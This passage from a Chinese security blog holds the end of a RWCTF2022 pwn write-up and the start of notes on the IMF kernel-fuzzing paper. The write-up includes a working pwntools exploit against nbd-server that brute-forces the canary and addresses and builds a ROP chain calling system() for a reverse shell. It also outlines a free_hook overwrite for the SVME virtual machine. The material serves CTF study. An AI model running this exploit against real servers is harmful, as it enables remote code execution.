p.send(cmd + <span class="string">b&#x27;\x00&#x27;</span>*padding_len)             <span class="comment"># name 指针，用于存放执行 system 函数的命令参数</span></span><br><span class="line"></span><br><span class="line">    p.send(p16(<span class="number">0</span>, endian=<span class="string">&quot;big&quot;</span>))                  <span class="comment"># n_requests</span></span><br><span class="line"></span><br><span class="line">    <span class="keyword">return</span> p</span><br><span class="line"></span><br><span class="line"><span class="keyword">def</span> <span class="title function_">exploit_stack_data</span>(<span class="params">payload, target_len=<span class="number">8</span></span>):</span><br><span class="line">    data = <span class="string">b&quot;&quot;</span></span><br><span class="line">    <span class="keyword">while</span> <span class="built_in">len</span>(data) &lt; target_len:</span><br><span class="line">        <span class="keyword">for</span> ch <span class="keyword">in</span> <span class="built_in">range</span>(<span class="number">256</span>):</span><br><span class="line">            p = send_new_request(payload + data + p8(ch))</span><br><span class="line">            p.clean()</span><br><span class="line"></span><br><span class="line">            log.info(<span class="string">&quot;Getting stack mem: &quot;</span> + \</span><br><span class="line">                <span class="built_in">hex</span>(<span class="built_in">int</span>.from_bytes(data,byteorder=<span class="string">&#x27;little&#x27;</span>)) + \</span><br><span class="line">                <span class="string">&quot;, ch: &quot;</span> + <span class="built_in">str</span>(ch))</span><br><span class="line">            <span class="keyword">try</span>:</span><br><span class="line">                p.recv(timeout=<span class="number">1</span>)</span><br><span class="line">                p.close()</span><br><span class="line">                data += p8(ch)</span><br><span class="line">                <span class="keyword">break</span></span><br><span class="line">            <span class="keyword">except</span> EOFError:</span><br><span class="line">                p.close()</span><br><span class="line">            </span><br><span class="line">    <span class="keyword">return</span> data</span><br><span class="line">    </span><br><span class="line"><span class="keyword">if</span> __name__ == <span class="string">&#x27;__main__&#x27;</span>:</span><br><span class="line">    b2i = <span class="keyword">lambda</span> addr : <span class="built_in">int</span>.from_bytes(addr,byteorder=<span class="string">&#x27;little&#x27;</span>)</span><br><span class="line"></span><br><span class="line">    <span class="keyword">if</span> <span class="literal">True</span>:</span><br><span class="line">        canary = p64(<span class="number">0x5af9ebae046ded00</span>)</span><br><span class="line">        client_addr = p64(<span class="number">0x555cbd36c9b0</span>)</span><br><span class="line">        ret_addr = p64(<span class="number">0x555cbbb901b7</span>)</span><br><span class="line">    <span class="keyword">else</span>:</span><br><span class="line">        canary = <span class="literal">None</span></span><br><span class="line">        client_addr = <span class="literal">None</span></span><br><span class="line">        ret_addr = p8(<span class="number">0xb7</span>) <span class="comment"># 手动指定最后一个字节，提高爆破精度</span></span><br><span class="line">    ret_addr_offset = <span class="number">0x91B7</span></span><br><span class="line"></span><br><span class="line">    <span class="keyword">if</span> canary <span class="keyword">is</span> <span class="literal">None</span>:</span><br><span class="line">        canary = exploit_stack_data(<span class="string">b&#x27;a&#x27;</span>*<span class="number">0x408</span>, target_len=<span class="number">8</span>)</span><br><span class="line">        log.info(<span class="string">&quot;=================================&quot;</span>)</span><br><span class="line">        log.success(<span class="string">&quot;canary: &quot;</span> + <span class="built_in">hex</span>(b2i(canary)))</span><br><span class="line">        <span class="built_in">input</span>()</span><br><span class="line"></span><br><span class="line">    <span class="keyword">if</span> client_addr <span class="keyword">is</span> <span class="literal">None</span>:</span><br><span class="line">        client_addr = exploit_stack_data(<span class="string">b&#x27;a&#x27;</span>*<span class="number">0x408</span> + canary + <span class="string">b&#x27;b&#x27;</span>*<span class="number">0x18</span>, target_len=<span class="number">8</span>)</span><br><span class="line">        log.info(<span class="string">&quot;=================================&quot;</span>)</span><br><span class="line">        log.success(<span class="string">&quot;client addr: &quot;</span> + <span class="built_in">hex</span>(b2i(client_addr)))</span><br><span class="line">        <span class="built_in">input</span>()</span><br><span class="line"></span><br><span class="line">    <span class="keyword">if</span> <span class="built_in">len</span>(ret_addr) &lt; <span class="number">8</span>:</span><br><span class="line">        ret_addr += exploit_stack_data(</span><br><span class="line">            <span class="string">b&#x27;a&#x27;</span>*<span class="number">0x408</span> + canary + <span class="string">b&#x27;b&#x27;</span>*<span class="number">0x18</span> + client_addr + <span class="string">b&#x27;c&#x27;</span>*<span class="number">0x18</span> + ret_addr, target_len=<span class="number">7</span>)</span><br><span class="line">        log.info(<span class="string">&quot;=================================&quot;</span>)</span><br><span class="line">        log.success(<span class="string">&quot;ret addr: &quot;</span> + <span class="built_in">hex</span>(b2i(ret_addr)))</span><br><span class="line">        <span class="built_in">input</span>()</span><br><span class="line"></span><br><span class="line">    elf = ELF(<span class="string">&quot;./nbd-server&quot;</span>)</span><br><span class="line">    elf.address = b2i(ret_addr) - ret_addr_offset</span><br><span class="line">    log.success(<span class="string">&quot;ELF base addr: &quot;</span> + <span class="built_in">hex</span>(elf.address))</span><br><span class="line">    <span class="keyword">assert</span> elf.address &amp; <span class="number">0xfff</span> == <span class="number">0</span></span><br><span class="line"></span><br><span class="line">    elf_rop = ROP(elf)</span><br><span class="line">    elf_rop.system(b2i(client_addr) + <span class="number">0x180</span>)</span><br><span class="line">    <span class="built_in">print</span>(elf_rop.dump())</span><br><span class="line"></span><br><span class="line">    log.info(<span class="string">&quot;Try getting reverse shell&quot;</span>)</span><br><span class="line">    p = send_new_request(<span class="string">b&#x27;a&#x27;</span>*<span class="number">0x408</span> + canary + <span class="string">b&#x27;b&#x27;</span>*<span class="number">0x18</span> + client_addr + <span class="string">b&#x27;c&#x27;</span>*<span class="number">0x18</span> + elf_rop.chain())</span><br><span class="line">    p.interactive()</span><br></pre></td></tr></table></figure><p>坑点主要在于<strong>爆破</strong>。整个 exp 中爆破是重中之重，但在低地址字节处的爆破容易产生误报，因此最好多爆破几次。需要爆破的数据主要有以下三点：</p><ul><li><p>canary 爆破：错1个字节就直接 abort，这在爆破上是件好事，最容易爆破的数据。</p></li><li><p>ret address 爆破：需要手动指定最低地址的那个字节，以提高爆破精度。低地址 1 字节的值可以通过 IDA 得知（注意页对齐大小为 0x1000）。</p></li><li><p>client address 爆破：由于调用 handle_info 函数时，调用者会将 client 的地址压入栈上（old r12)，因此在离开 handle_info 之前，需要执行<code>pop r12</code>指令。我们可以尝试对该 r12 进行爆破，以获取到 client 地址，并根据相对偏移获取存储 system 命令的 name 内存地址。</p><p>注意点</p><ul><li>由于程序中较多使用 socket_read 函数，该函数会使用到 client 上的函数指针，因此 client 地址哪怕偏移一个字节都会造成 SIGSEGV，这在爆破上是一件好事。</li><li>但是在实际爆破过程中，client addr 是比较容易误报的，需要仔细甄别。</li></ul></li></ul><h2 id="四、SVME">四、SVME</h2><h3 id="1-SVME-小叙">1. SVME 小叙</h3><figure class="highlight text"><table><tr><td class="gutter"><pre><span class="line">1</span><br><span class="line">2</span><br><span class="line">3</span><br><span class="line">4</span><br><span class="line">5</span><br></pre></td><td class="code"><pre><span class="line">Professor Terence Parr has taught us how to build a virtual machine. Now it&#x27;s time to break it!</span><br><span class="line">nc 47.243.140.252 1337</span><br><span class="line">attachment</span><br><span class="line"></span><br><span class="line">Clone-and-Pwn, Virtual Machine, difficulty:baby</span><br></pre></td></tr></table></figure><p>一个简易的开源 VM，baby 难度。</p><h3 id="2-SVME-环境搭建">2. SVME 环境搭建</h3><p>题目给了一个 <a href="http://libc-2.31.so">libc-2.31.so</a> 附件和 main.c ：</p><figure class="highlight cpp"><table><tr><td class="gutter"><pre><span class="line">1</span><br><span class="line">2</span><br><span class="line">3</span><br><span class="line">4</span><br><span class="line">5</span><br><span class="line">6</span><br><span class="line">7</span><br><span class="line">8</span><br><span class="line">9</span><br><span class="line">10</span><br><span class="line">11</span><br><span class="line">12</span><br><span class="line">13</span><br><span class="line">14</span><br><span class="line">15</span><br><span class="line">16</span><br></pre></td><td class="code"><pre><span class="line"><span class="meta">#<span class="keyword">include</span> <span class="string">&lt;stdbool.h&gt;</span></span></span><br><span class="line"><span class="meta">#<span class="keyword">include</span> <span class="string">&lt;unistd.h&gt;</span></span></span><br><span class="line"><span class="meta">#<span class="keyword">include</span> <span class="string">&quot;vm.h&quot;</span></span></span><br><span class="line"></span><br><span class="line"><span class="function"><span class="type">int</span> <span class="title">main</span><span class="params">(<span class="type">int</span> argc, <span class="type">char</span> *argv[])</span> </span>&#123;</span><br><span class="line">    <span class="type">int</span> code[<span class="number">128</span>], nread = <span class="number">0</span>;</span><br><span class="line">    <span class="keyword">while</span> (nread &lt; <span class="built_in">sizeof</span>(code)) &#123;</span><br><span class="line">        <span class="type">int</span> ret = <span class="built_in">read</span>(<span class="number">0</span>, code+nread, <span class="built_in">sizeof</span>(code)-nread);</span><br><span class="line">        <span class="keyword">if</span> (ret &lt;= <span class="number">0</span>) <span class="keyword">break</span>;</span><br><span class="line">        nread += ret;</span><br><span class="line">    &#125;</span><br><span class="line">    VM *vm = <span class="built_in">vm_create</span>(code, nread/<span class="number">4</span>, <span class="number">0</span>);</span><br><span class="line">    <span class="built_in">vm_exec</span>(vm, <span class="number">0</span>, <span class="literal">true</span>);</span><br><span class="line">    <span class="built_in">vm_free</span>(vm);</span><br><span class="line">    <span class="keyword">return</span> <span class="number">0</span>;</span><br><span class="line">&#125;</span><br></pre></td></tr></table></figure><p>执行以下命令配置环境：</p><figure class="highlight bash"><table><tr><td class="gutter"><pre><span class="line">1</span><br><span class="line">2</span><br><span class="line">3</span><br><span class="line">4</span><br><span class="line">5</span><br></pre></td><td class="code"><pre><span class="line">git <span class="built_in">clone</span> git@github.com:parrt/simple-virtual-machine-C.git</span><br><span class="line"><span class="built_in">cp</span> ./main.c /simple-virtual-machine-C-master/src/vmtest.c</span><br><span class="line"><span class="built_in">cd</span> simple-virtual-machine-C-master</span><br><span class="line">cmake .</span><br><span class="line">make</span><br></pre></td></tr></table></figure><h3 id="3-漏洞点-3">3. 漏洞点</h3><p>首先，我们可以在 <a href="https://github.com/parrt/simple-virtual-machine-C/blob/master/src/vm.h#L40">#L40</a> 看到 VM 结构体的布局：</p><figure class="highlight cpp"><table><tr><td class="gutter"><pre><span class="line">1</span><br><span class="line">2</span><br><span class="line">3</span><br><span class="line">4</span><br><span class="line">5</span><br><span class="line">6</span><br><span class="line">7</span><br><span class="line">8</span><br><span class="line">9</span><br><span class="line">10</span><br><span class="line">11</span><br><span class="line">12</span><br><span class="line">13</span><br><span class="line">14</span><br><span class="line">15</span><br><span class="line">16</span><br><span class="line">17</span><br></pre></td><td class="code"><pre><span class="line"><span class="keyword">typedef</span> <span class="keyword">struct</span> &#123;</span><br><span class="line">    <span class="type">int</span> returnip;</span><br><span class="line">    <span class="type">int</span> locals[DEFAULT_NUM_LOCALS];</span><br><span class="line">&#125; Context;</span><br><span class="line"></span><br><span class="line"><span class="keyword">typedef</span> <span class="keyword">struct</span> &#123;</span><br><span class="line">    <span class="type">int</span> *code;</span><br><span class="line">    <span class="type">int</span> code_size;</span><br><span class="line"></span><br><span class="line">    <span class="comment">// global variable space</span></span><br><span class="line">    <span class="type">int</span> *globals;</span><br><span class="line">    <span class="type">int</span> nglobals;</span><br><span class="line"></span><br><span class="line">    <span class="comment">// Operand stack, grows upwards</span></span><br><span class="line">    <span class="type">int</span> stack[DEFAULT_STACK_SIZE];</span><br><span class="line">    Context call_stack[DEFAULT_CALL_STACK_SIZE];</span><br><span class="line">&#125; VM;</span><br></pre></td></tr></table></figure><p>根据 main.c 的代码，可以得知创建出的 VM 结构体，其 <strong>code 字段指向栈</strong>，<strong>globals 字段指向堆</strong>。</p><p>而在 opcode LOAD 和 STORE 的处理中，我们可以看到，这里可以 <strong>相对 VM 结构体（注意结构体在堆中）</strong> 偏移任意字节进行读写。</p><figure class="highlight cpp"><table><tr><td class="gutter"><pre><span class="line">1</span><br><span class="line">2</span><br><span class="line">3</span><br><span class="line">4</span><br><span class="line">5</span><br><span class="line">6</span><br><span class="line">7</span><br><span class="line">8</span><br><span class="line">9</span><br></pre></td><td class="code"><pre><span class="line"><span class="keyword">case</span> LOAD: <span class="comment">// load local or arg</span></span><br><span class="line">    offset = vm-&gt;code[ip++];</span><br><span class="line">    vm-&gt;stack[++sp] = vm-&gt;call_stack[callsp].locals[offset];</span><br><span class="line">    <span class="keyword">break</span>;</span><br><span class="line">[...]</span><br><span class="line"><span class="keyword">case</span> STORE:</span><br><span class="line">    offset = vm-&gt;code[ip++];</span><br><span class="line">    vm-&gt;call_stack[callsp].locals[offset] = vm-&gt;stack[sp--];</span><br><span class="line">    <span class="keyword">break</span>;</span><br></pre></td></tr></table></figure><p>同时，opcode GLOAD 和 GSTORE 可以让我们<strong>相对 globals 指针所指向的内存</strong>偏移任意字节进行读写。</p><figure class="highlight cpp"><table><tr><td class="gutter"><pre><span class="line">1</span><br><span class="line">2</span><br><span class="line">3</span><br><span class="line">4</span><br><span class="line">5</span><br><span class="line">6</span><br><span class="line">7</span><br><span class="line">8</span><br></pre></td><td class="code"><pre><span class="line"><span class="keyword">case</span> GLOAD: <span class="comment">// load from global memory</span></span><br><span class="line">    addr = vm-&gt;code[ip++];</span><br><span class="line">    vm-&gt;stack[++sp] = vm-&gt;globals[addr];</span><br><span class="line">    <span class="keyword">break</span>;</span><br><span class="line"><span class="keyword">case</span> GSTORE:</span><br><span class="line">    addr = vm-&gt;code[ip++];</span><br><span class="line">    vm-&gt;globals[addr] = vm-&gt;stack[sp--];</span><br><span class="line">    <span class="keyword">break</span>;</span><br></pre></td></tr></table></figure><p>这样，我们便可以利用这些 opcode 来泄露指针并任意读写内存，进而修改 libc 上的 free hook，在 VM 退出时劫持控制流。</p><h3 id="4-利用流程-3">4. 利用流程</h3><ul><li><p>使用 STORE，让 <code>VM-&gt;stack</code> 向低地址处移动，读取 globals 和 code 的指针值，<strong>并保存 vm-&gt;call_stack 上</strong>，之后恢复 <code>VM-&gt;stack</code>。</p><blockquote><p>恢复时需要覆写 globals 和 code 指针，注意需要覆写正确。</p></blockquote></li><li><p>使用任意地址读，读取栈上的 libc_start_main return address，计算出 libc base、free_hook 和 one_gadget addr。</p></li><li><p>使用任意地址写，修改 free_hook 上的地址条目为 one_gadget，劫持控制流获取 shell。</p></li></ul><blockquote><p>这题利用较为简单，exp 鸽了。</p></blockquote>]]></content>
    
    
      
      
    <summary type="html">&lt;h2 id=&quot;一、简介&quot;&gt;一、简介&lt;/h2&gt;
&lt;p&gt;这里是复盘 RWCTF2022 关于:&lt;/p&gt;
&lt;ul&gt;
&lt;li&gt;QLaas&lt;/li&gt;
&lt;li&gt;Who Moved My Block&lt;/li&gt;
&lt;li&gt;SVME&lt;/li&gt;
&lt;/ul&gt;
&lt;p&gt;这三道题时所写下的一些笔记。&lt;/p&gt;</summary>
      
    
    
    
    
    <category term="CTF" scheme="https://kiprey.github.io/tags/CTF/"/>
    
    <category term="Pwn" scheme="https://kiprey.github.io/tags/Pwn/"/>
    
  </entry>
  
  <entry>
    <title>《IMF：Inferred Model-based Fuzzer》论文笔记</title>
    <link href="https://kiprey.github.io/2022/01/IMF/"/>
    <id>https://kiprey.github.io/2022/01/IMF/</id>
    <published>2022-01-19T16:00:00.000Z</published>
    <updated>2025-11-24T03:59:39.784Z</updated>
    
    <content type="html"><![CDATA[<h2 id="一、简介">一、简介</h2><ul><li><p>内核 API 函数之间的调用大多是相互依赖的，即一些 API 的调用需要依赖其他 API 调用所产生的上下文，因此若给定的调用上下文无用，则内核 API 将会始终执行失败，无法进入到更深层次的逻辑中。</p></li><li><p>这篇论文提出了一种新的内核 fuzz 方式，它利用内核 API 函数之间的依赖（即 API 调用序列的相似性），来推断出依赖模型，进而利用该模型生成出<strong>随机并且结构性良好的 API 序列</strong>，进行更深层次的 fuzz。</p><p>其中，API 调用的依赖关系包含两种，分别是</p><ol><li>顺序依赖，即 A 函数应该比 B 函数更早被调用。</li><li>数据依赖，函数调用之间存在着数据流传递。</li></ol></li><li><p>Fuzz 的主要目标是 <strong>IOKit Lib</strong>。</p></li><li><p>IMF src - <a href="https://github.com/SoftSec-KAIST/IMF">github</a></p></li></ul><blockquote><p>需要注意的是，这篇论文是 17 年的论文，实验时所使用的 MacOS 版本为 10.12.3，而本人的机器版本为 MacOS 12.0.1，因此在复现实验是会存在一些困难。</p></blockquote><span id="more"></span><h2 id="二、架构">二、架构</h2><p>该论文所提出的 IMF 架构图如下所示：</p><p><img src="/2022/01/IMF/image-20220118102357121.png" alt="image-20220118102357121"></p><p>其中， IMF 共有三部分组成，分别是</p><ul><li>Logger：用于记录指定应用程序的 API 调用日志。调用日志中包括了调用函数名，调用传入的参数值等等数据。</li><li>Inferrer：从 Logger 生成的 API log 中推断出<strong>顺序依赖和数据依赖</strong>。初始时 Inferrer 会在 Logger 生成的 L 条 log 中，筛选出最大前缀长度的 N (N &lt; L) 个日志；之后这 N 个日志将用于推断依赖关系，生成 API 依赖模型。</li><li>Fuzzer：使用推断出的 API 依赖模型动态生成出 testcase 并用于测试。</li></ul><h2 id="三、例子">三、例子</h2><p>论文中给了一个 fuzz 过程的示例。通过这个示例我们可以简单了解一下整个 IMF 的处理过程。</p><h3 id="1-初始">1. 初始</h3><p>初始时，给定一系列配置文件和 <strong>API 函数原型注释文件</strong>，其中后者存放着目标 IOKit API 的函数名称、参数类型与个数等等的信息，通常以 JSON 格式保存。</p><p>API 函数原型注释文件，主要用于生成 API hook 以及为 API 依赖关系推断。</p><h3 id="2-安装-API-hook">2. 安装 API hook</h3><ul><li><p>开始时，IMF 为目标程序 2048 Game <strong>安装 API hook</strong>，这样当目标程序调用 IOKit Lib 时，这些函数调用将会被 hook 并被记录下来。</p></li><li><p>之后模拟鼠标输入或键盘输入，为目标程序提供输入，这样目标程序就会调用 IOKit 并留下 API Log。</p></li><li><p>尝试循环执行目标程序 L=1000 次并记录下 L 个日志。</p></li></ul><blockquote><p>需要注意的是，本人实际复现实验时，可能是受限于 MacOS 版本问题，hook 2048 Game 无法记录下任何 IOKit Log（但是 VSCode 可以，但是日志数量较少）。</p><p>因此本人在实验时，所选定的目标程序为 <code>/usr/sbin/ioreg</code>。</p></blockquote><p>每一次的日志中都会记录下调用 API 时的 <strong>1) 输入参数的类型与值；2) 返回值的类型与值</strong>。</p><h3 id="3-过滤-API-log">3. 过滤 API log</h3><p>直到目前，API hook 已经记录下了 L=1000 个日志，那么接下来就需要对其进行筛选，从中筛出 log 的子集。</p><p>这里的例子中，从 L=1000 个日志里，筛选出了 N=2 个<strong>最长公共前缀</strong>的日志。</p><blockquote><p>需要注意的是，由于 GUI 事件的非确定性，对于同一个 GUI 程序的相同输入，hook <strong>可能不会生成相同的 API 调用序列</strong>。</p><p>但如果使用的目标程序是非 GUI 程序，则生成的 API log 大体相同。</p></blockquote><h3 id="4-依赖推断">4. 依赖推断</h3><h4 id="a-顺序依赖">a. 顺序依赖</h4><p>首先， IMF 假设，应该保留 log 中的 API 调用顺序。但这样可能在模型中包含不必要的顺序依赖关系，导致调用之间的顺序依赖过于近似。不过在实际 fuzz 时会适当放宽这个假设。</p><p>此时能获取到的调用顺序如下，其中 $A&lt;B$ 表示函数 A 的调用点在函数 B 的调用点之<strong>前</strong>：</p><p>$$IOServiceMatching &lt; IOServiceGetMatchingService &lt; IOServiceOpen &lt; IOConnectCallMethod$$</p><h4 id="b-数据依赖">b. 数据依赖</h4><p>接下来，IMF 将会从 N=2 的 log 子集中，</p><ol><li>检测并识别出<strong>常量类型的参数值</strong>。先上张图，其中<strong>绿色</strong>字体表示常量，常量值将被排除在数据流分析之外：</li></ol><blockquote><p>注意，由于先前已经给定了一个 API 函数原型注释文件，因此对于 handler 类型（即诸如<code>io_service_t</code> 和 <code>io_connect_t</code> 的参数，将不会被识别为常量。</p></blockquote><p><img src="/2022/01/IMF/image-20220118114142794.png" alt="image-20220118114142794"></p><ol start="2"><li><p>检测数据依赖。若前一个函数调用的返回值，作为了后一个函数调用的参数值，那么可以说这两个函数调用之间存在数据依赖关系，即图中黑色虚线所标识的那样。</p><p>该论文实现了多种启发式数据依赖的检测方式，这里只是简单介绍了一种。</p></li></ol><h4 id="c-模型生成">c. 模型生成</h4><p>该图是根据上图所生成的一个 API Model，模型使用 AST 来表示：</p><p><img src="/2022/01/IMF/image-20220118120407950.png" alt="image-20220118120407950"></p><p>在这个模型中，我们可以很明显的看到每个函数调用都遵循了先前所推断出的顺序依赖，以及函数之间的值依赖关系。</p><p>对于指针 outStructCnt 与 API 的关系，IMF 也可以根据先前所给定的 API 函数注释文件来获取到两者之间的内部关系，从而产生诸如第九行这样的代码。</p><p>之后 IMF 便可以根据模型来进行变异与生成。</p><h2 id="四、具体实现">四、具体实现</h2><h3 id="1-Logger">1. Logger</h3><h4 id="a-论文细节">a. 论文细节</h4><p>Logger 需要处理两个问题：</p><ul><li>目标程序的输入从何而来？</li><li>记录 log 时需要记录多少数据？</li></ul><p>首先对于第一个问题：由于论文中使用的目标程序大多是 GUI 程序，而 GUI 程序的输入大多是鼠标事件和键盘事件，因此可以使用 PyUserInput 来为目标程序模拟输入事件。</p><p>对于第二个问题：记录 log 时，需要保存多少级间接指针的数据？若级别太多，则会占用大量的磁盘空间，加大分析难度。因此在该论文的实验中，只保存了一级间接指针的数据。</p><h4 id="b-技术细节">b. 技术细节</h4><p>在论文所提供的代码中， <a href="http://const.py">const.py</a> 文件里已经事先记录了目标 IOKit API 的函数原型定义。一个简单的示例如下所示：</p><figure class="highlight python"><table><tr><td class="gutter"><pre><span class="line">1</span><br><span class="line">2</span><br><span class="line">3</span><br><span class="line">4</span><br><span class="line">5</span><br><span class="line">6</span><br><span class="line">7</span><br><span class="line">8</span><br><span class="line">9</span><br><span class="line">10</span><br><span class="line">11</span><br><span class="line">12</span><br><span class="line">13</span><br><span class="line">14</span><br></pre></td><td class="code"><pre><span class="line"><span class="comment"># const.py</span></span><br><span class="line">API_DEFS = [</span><br><span class="line">    [</span><br><span class="line">        <span class="comment"># kern_return_t IOConnectGetService(io_connect_t connect, io_service_t *service);</span></span><br><span class="line">        (<span class="string">&#x27;kern_return_t&#x27;</span>, <span class="string">&#x27;IOConnectGetService&#x27;</span>), </span><br><span class="line">        [</span><br><span class="line">            <span class="comment"># 第一个参数</span></span><br><span class="line">            (<span class="string">&#x27;io_connect_t&#x27;</span>, <span class="string">&#x27;connect&#x27;</span>, &#123;&#125;), </span><br><span class="line">            <span class="comment"># 第二个参数。指针参数的第三个字段，即字典中存在一对键值对 IO，用于说明在该函数中，数据是流向指针所指向的内存，还是从该内存中流出；这将用于进一步的数据流分析。</span></span><br><span class="line">            (<span class="string">&#x27;io_service_t *&#x27;</span>, <span class="string">&#x27;service&#x27;</span>, &#123;<span class="string">&#x27;IO&#x27;</span>:<span class="string">&#x27;O&#x27;</span>&#125;) </span><br><span class="line">        ]</span><br><span class="line">    ],</span><br><span class="line">    ......</span><br><span class="line">]</span><br></pre></td></tr></table></figure><p>之后，<a href="http://hook.py">hook.py</a> 文件将根据给定的 IOKit API 函数原型，结合 C 语言 hook 代码的模板，生成诸如以下 C 代码的 hook.c 文件：</p><figure class="highlight cpp"><table><tr><td class="gutter"><pre><span class="line">1</span><br><span class="line">2</span><br><span class="line">3</span><br><span class="line">4</span><br><span class="line">5</span><br><span class="line">6</span><br><span class="line">7</span><br><span class="line">8</span><br><span class="line">9</span><br><span class="line">10</span><br><span class="line">11</span><br><span class="line">12</span><br><span class="line">13</span><br><span class="line">14</span><br><span class="line">15</span><br><span class="line">16</span><br><span class="line">17</span><br><span class="line">18</span><br><span class="line">19</span><br><span class="line">20</span><br><span class="line">21</span><br><span class="line">22</span><br><span class="line">23</span><br><span class="line">24</span><br><span class="line">25</span><br><span class="line">26</span><br><span class="line">27</span><br><span class="line">28</span><br><span class="line">29</span><br><span class="line">30</span><br><span class="line">31</span><br><span class="line">32</span><br><span class="line">33</span><br><span class="line">34</span><br><span class="line">35</span><br><span class="line">36</span><br><span class="line">37</span><br><span class="line">38</span><br><span class="line">39</span><br><span class="line">40</span><br><span class="line">41</span><br><span class="line">42</span><br><span class="line">43</span><br><span class="line">44</span><br><span class="line">45</span><br><span class="line">46</span><br><span class="line">47</span><br><span class="line">48</span><br><span class="line">49</span><br><span class="line">50</span><br><span class="line">51</span><br><span class="line">52</span><br><span class="line">53</span><br><span class="line">54</span><br><span class="line">55</span><br><span class="line">56</span><br><span class="line">57</span><br><span class="line">58</span><br><span class="line">59</span><br><span class="line">60</span><br><span class="line">61</span><br><span class="line">62</span><br><span class="line">63</span><br><span class="line">64</span><br><span class="line">65</span><br><span class="line">66</span><br><span class="line">67</span><br><span class="line">68</span><br><span class="line">69</span><br><span class="line">70</span><br><span class="line">71</span><br><span class="line">72</span><br><span class="line">73</span><br><span class="line">74</span><br><span class="line">75</span><br><span class="line">76</span><br><span class="line">77</span><br><span class="line">78</span><br><span class="line">79</span><br><span class="line">80</span><br><span class="line">81</span><br><span class="line">82</span><br><span class="line">83</span><br></pre></td><td class="code"><pre><span class="line"><span class="meta">#<span class="keyword">include</span> <span class="string">&lt;stdint.h&gt;</span></span></span><br><span class="line"><span class="meta">#<span class="keyword">include</span> <span class="string">&lt;stdio.h&gt;</span></span></span><br><span class="line"><span class="meta">#<span class="keyword">include</span> <span class="string">&lt;stdlib.h&gt;</span></span></span><br><span class="line"><span class="meta">#<span class="keyword">include</span> <span class="string">&lt;time.h&gt;</span></span></span><br><span class="line"><span class="meta">#<span class="keyword">include</span> <span class="string">&lt;IOKit/IOKitLib.h&gt;</span></span></span><br><span class="line"><span class="meta">#<span class="keyword">include</span> <span class="string">&lt;fcntl.h&gt;</span></span></span><br><span class="line"><span class="meta">#<span class="keyword">include</span> <span class="string">&lt;unistd.h&gt;</span></span></span><br><span class="line"><span class="meta">#<span class="keyword">include</span> <span class="string">&lt;sys/file.h&gt;</span></span></span><br><span class="line"><span class="meta">#<span class="keyword">include</span> <span class="string">&lt;CoreFoundation/CoreFoundation.h&gt;</span></span></span><br><span class="line"></span><br><span class="line"><span class="meta">#<span class="keyword">ifndef</span> LOG_PATH</span></span><br><span class="line"><span class="meta">#<span class="keyword">define</span> LOG_PATH <span class="string">&quot;/tmp/log&quot;</span></span></span><br><span class="line"><span class="meta">#<span class="keyword">endif</span></span></span><br><span class="line"></span><br><span class="line"><span class="type">const</span> <span class="type">char</span>* log_path = LOG_PATH;</span><br><span class="line"><span class="comment">// 生成 JSON 格式</span></span><br><span class="line"><span class="function"><span class="type">void</span> <span class="title">log_CFTypeRef</span><span class="params">(FILE *f,CFTypeRef target)</span></span>&#123;</span><br><span class="line">  CFTypeID ty = <span class="built_in">CFGetTypeID</span>(target);</span><br><span class="line">  <span class="keyword">if</span> (ty == <span class="built_in">CFStringGetTypeID</span>())&#123;</span><br><span class="line">    <span class="built_in">fprintf</span>(f,<span class="string">&quot;&#x27;%s&#x27;&quot;</span>,<span class="built_in">CFStringGetCStringPtr</span>(target,kCFStringEncodingUTF8));</span><br><span class="line">  &#125;<span class="keyword">else</span> <span class="keyword">if</span> (ty == <span class="built_in">CFDictionaryGetTypeID</span>())&#123;</span><br><span class="line">    <span class="built_in">fprintf</span>(f,<span class="string">&quot;&#123;&quot;</span>);</span><br><span class="line">    <span class="type">size_t</span> size = <span class="built_in">CFDictionaryGetCount</span>(target);</span><br><span class="line">    CFTypeRef *keys = (CFTypeRef *) <span class="built_in">malloc</span>( size * <span class="built_in">sizeof</span>(CFTypeRef) );</span><br><span class="line">    CFTypeRef *vals = (CFTypeRef *) <span class="built_in">malloc</span>( size * <span class="built_in">sizeof</span>(CFTypeRef) );</span><br><span class="line">    <span class="built_in">CFDictionaryGetKeysAndValues</span>(target,keys,vals);</span><br><span class="line">    <span class="keyword">for</span>(<span class="type">size_t</span> i=<span class="number">0</span>;i&lt;size; i++)&#123;</span><br><span class="line">      <span class="built_in">log_CFTypeRef</span>(f,keys[i]);</span><br><span class="line">      <span class="built_in">fprintf</span>(f,<span class="string">&quot;:&quot;</span>);</span><br><span class="line">      <span class="built_in">log_CFTypeRef</span>(f,vals[<span class="number">0</span>]);</span><br><span class="line">      <span class="built_in">fprintf</span>(f,<span class="string">&quot;,&quot;</span>);</span><br><span class="line">    </span><br><span class="line">    &#125;</span><br><span class="line">    <span class="built_in">fprintf</span>(f,<span class="string">&quot;&#125;&quot;</span>);</span><br><span class="line">    <span class="built_in">free</span>(keys);</span><br><span class="line">    <span class="built_in">free</span>(vals);</span><br><span class="line">  &#125;<span class="keyword">else</span> <span class="keyword">if</span> (ty == <span class="built_in">CFNumberGetTypeID</span>())&#123;</span><br><span class="line">    <span class="type">uint64_t</span> n;</span><br><span class="line">    <span class="built_in">CFNumberGetValue</span>(target,<span class="built_in">CFNumberGetType</span>(target),&amp;n);</span><br><span class="line">    <span class="built_in">fprintf</span>(f,<span class="string">&quot;%d&quot;</span>,n);</span><br><span class="line">  &#125;<span class="keyword">else</span> <span class="keyword">if</span> (ty == <span class="built_in">CFBooleanGetTypeID</span>())&#123;</span><br><span class="line">    <span class="built_in">fprintf</span>(f,<span class="string">&quot;%s&quot;</span>,<span class="built_in">CFBooleanGetValue</span>(target)?<span class="string">&quot;True&quot;</span>:<span class="string">&quot;False&quot;</span>);</span><br><span class="line">  &#125;<span class="keyword">else</span>&#123;</span><br><span class="line">    <span class="built_in">fprintf</span>(f,<span class="string">&quot;log_CFTypeRef ERROR&quot;</span>);</span><br><span class="line">    <span class="built_in">exit</span>(<span class="number">0</span>);</span><br><span class="line">  &#125;</span><br><span class="line">&#125;</span><br><span class="line"></span><br><span class="line"><span class="comment">// IOCatalogueReset 函数 hook 后的处理操作</span></span><br><span class="line"><span class="function"><span class="type">kern_return_t</span> <span class="title">fake_IOCatalogueReset</span><span class="params">(<span class="type">mach_port_t</span> masterPort,<span class="type">uint32_t</span> flag)</span></span>&#123;</span><br><span class="line">  FILE *fp = <span class="built_in">fopen</span>(log_path,<span class="string">&quot;a&quot;</span>);</span><br><span class="line">  <span class="built_in">flock</span>(<span class="built_in">fileno</span>(fp),LOCK_EX);</span><br><span class="line">  <span 